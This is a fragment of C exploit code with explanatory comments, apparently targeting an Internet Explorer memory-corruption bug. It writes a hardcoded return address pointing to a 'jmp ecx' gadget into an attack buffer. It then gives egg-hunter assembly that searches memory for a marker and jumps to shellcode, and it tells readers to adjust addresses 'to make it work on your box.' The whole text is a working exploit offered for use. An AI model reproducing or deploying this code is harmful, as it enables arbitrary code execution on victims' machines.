/*
Code execution is due to a call [eax] where we can control eax, and ecx points to a place
where we can write some instructions. But there is not enough space to put our shellcode.
So the following ret address is in Imagehlp. It points to 0x0108B6FF which is jmp ecx in Ieframe.
Change this to make it work on your box.
*/
memcpy(evilbuff+0x5522,"\x75\x14\xC5\x76",4);
/* As I said there's not enough space there for us but I've noticed another area that can hold our
shellcode. However it doesnt have a fixed location so we have to browse the data section to find it.
I've added a marker (DBCA) at the beginning of the code to find its place and the following code try
to locate it:

b:
mov eax, 41424344
dec ecx
mov edx, [ecx]
cmp edx, eax
je e
jmp b
e:
inc ecx, 4
jmp ecx
*/